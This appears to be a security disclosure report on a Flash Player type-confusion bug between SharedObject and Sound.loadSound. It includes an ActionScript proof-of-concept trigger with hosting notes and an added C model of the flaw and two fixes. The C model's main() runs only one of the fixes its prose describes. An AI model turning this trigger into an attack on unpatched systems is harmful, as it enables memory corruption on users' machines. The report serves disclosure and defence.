The SharedObject constructor does not check that the object it is given is of
type Object before changing that object's native type to SharedObject. This
causes problems when another native method, such as Sound.loadSound, calls back
into script between checking the type of its input object and casting that
object's native representation: the script callback can run the SharedObject
constructor on the object, so the cast that follows operates on a native object
of the wrong type. A PoC is as follows:
class subso extends Sound {
    public function subso(f) {
        super("_level0.test");
        // n's valueOf runs script when loadSound coerces n to a String
        var n = {valueOf : func};
        // f is supplied by the caller (see the attached fla); func() below invokes it
        _global.func = f;
        _global.t = this;
        // Invoke loadSound via call() with n in place of the URL string
        var f2 = this.loadSound;
        f2.call(this, n, 1);
    }
    // Runs from inside loadSound, after its type check and before its native cast:
    // calls f with the Sound object (this) as its first argument
    function func() {
        _global.func(_global.t, "/sosuper.swf", "/sosuper.swf");
        return 1;
    }
}
A sample fla, swf and AS file are attached. Note that this PoC needs to be
hosted on a webserver to work, and only works on 32-bit systems (tested on
Windows Chrome). song1.mp3 should be put in the same folder on the server as
the swf; loadSound needs it in order to run. This bug is likely only
exploitable on 32-bit systems because of how the type-confused fields line up.
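The check/callback/cast window described above, as an added model written for
this page (it is not Flash Player code, and every name, function and struct
layout in it is invented): a script object carries a native-type tag and a
union of two differently laid-out native payloads; loadSound checks the tag,
coerces its URL argument (which runs a valueOf hook, mirroring the PoC's
func()), then casts; the unchecked SharedObject constructor plays the role of
the bug. The same scenario is then run against two fixes, the constructor
refusing non-Object inputs and loadSound finishing its coercions before the
type check. The field overlap is constructed so the misdirected write is
visible; the real fields and offsets are not known from the report.

```c
/* Added model of the check/callback/cast window described above. This is
 * illustrative code written for this page, not Flash Player source; every
 * name and layout here is invented. */
#include <stdio.h>
#include <string.h>

typedef enum { KIND_OBJECT, KIND_SOUND, KIND_SHAREDOBJECT } NativeKind;

/* Two native payloads with different meanings at the same offsets, sharing
 * one slot, so a write made through the wrong type lands in the other. */
typedef struct { int streaming; char target[28]; } SoundNative;
typedef struct { int max_size;  char path[28];   } SharedObjectNative;

typedef struct ScriptObject ScriptObject;
/* valueOf hook: the VM runs script here when coercing the object to a String. */
typedef const char *(*ValueOfFn)(ScriptObject *self, void *ctx);

struct ScriptObject {
    NativeKind kind;
    union { SoundNative snd; SharedObjectNative so; } u;
    ValueOfFn valueOf;
    void *ctx;
};

static ScriptObject make_plain(void) {
    ScriptObject o; memset(&o, 0, sizeof o); o.kind = KIND_OBJECT; return o;
}

static ScriptObject make_sound(const char *target) {
    ScriptObject o = make_plain();
    o.kind = KIND_SOUND;
    strncpy(o.u.snd.target, target, sizeof o.u.snd.target - 1);
    return o;
}

/* Buggy constructor, as in the report: retags whatever object it is handed. */
static int shared_object_ctor_unchecked(ScriptObject *o, const char *path) {
    memset(&o->u, 0, sizeof o->u);
    o->u.so.max_size = 100;
    strncpy(o->u.so.path, path, sizeof o->u.so.path - 1);
    o->kind = KIND_SHAREDOBJECT;
    return 0;
}

/* Fixed constructor: only a plain Object may become a SharedObject. */
static int shared_object_ctor_checked(ScriptObject *o, const char *path) {
    if (o->kind != KIND_OBJECT) return -1;
    return shared_object_ctor_unchecked(o, path);
}

/* String coercion of an argument: the point at which script gets to run. */
static const char *vm_to_string(ScriptObject *v) {
    return v->valueOf ? v->valueOf(v, v->ctx) : "[object Object]";
}

/* Vulnerable ordering: check the tag, coerce the URL (script runs), cast. */
static int load_sound_vulnerable(ScriptObject *self, ScriptObject *url, int streaming) {
    if (self->kind != KIND_SOUND) return -1;   /* type check ...                 */
    vm_to_string(url);                          /* ... script may retag self ...  */
    SoundNative *snd = &self->u.snd;            /* ... cast without re-checking   */
    snd->streaming = streaming;                 /* lands in SharedObject.max_size */
    return 0;
}

/* Fixed ordering: do every coercion first, then check the tag, then cast. */
static int load_sound_fixed(ScriptObject *self, ScriptObject *url, int streaming) {
    vm_to_string(url);
    if (self->kind != KIND_SOUND) return -1;
    self->u.snd.streaming = streaming;
    return 0;
}

typedef struct { ScriptObject *victim; int (*ctor)(ScriptObject *, const char *); } Hook;

/* Mirrors the PoC's func(): from inside valueOf, run the SharedObject
 * constructor on the Sound that is part-way through loadSound. */
static const char *retag_in_valueof(ScriptObject *self, void *ctx) {
    Hook *h = ctx;
    (void)self;
    h->ctor(h->victim, "/sosuper.swf");
    return "1";                                 /* the PoC's valueOf returns 1 */
}

/* Run the PoC against one constructor/loadSound pairing. Returns loadSound's
 * result; the Sound object's final state is left in *snd. */
static int run_poc(int (*ctor)(ScriptObject *, const char *),
                   int (*load)(ScriptObject *, ScriptObject *, int),
                   ScriptObject *snd) {
    *snd = make_sound("_level0.test");
    Hook h = { snd, ctor };
    ScriptObject n = make_plain();              /* n = {valueOf : func} */
    n.valueOf = retag_in_valueof;
    n.ctx = &h;
    return load(snd, &n, 1);
}

int main(void) {
    ScriptObject s;
    int r = run_poc(shared_object_ctor_unchecked, load_sound_vulnerable, &s);
    printf("unchecked ctor, vulnerable order: rc=%d kind=%d max_size=%d\n", r, s.kind, s.u.so.max_size);
    r = run_poc(shared_object_ctor_checked, load_sound_vulnerable, &s);
    printf("checked ctor, vulnerable order:   rc=%d kind=%d streaming=%d\n", r, s.kind, s.u.snd.streaming);
    return 0;
}
```

With the buggy pairing, loadSound's type check passes, the valueOf hook
retags the Sound as a SharedObject, and the write meant for Sound.streaming
overwrites the SharedObject's max_size. Either fix alone closes the window:
the checked constructor leaves the Sound untouched, and the reordered
loadSound sees the retagged object and refuses it.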
This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
Original issue reported on code.google.com by natashe...@google.com on 8 Jun 2015 at 11:42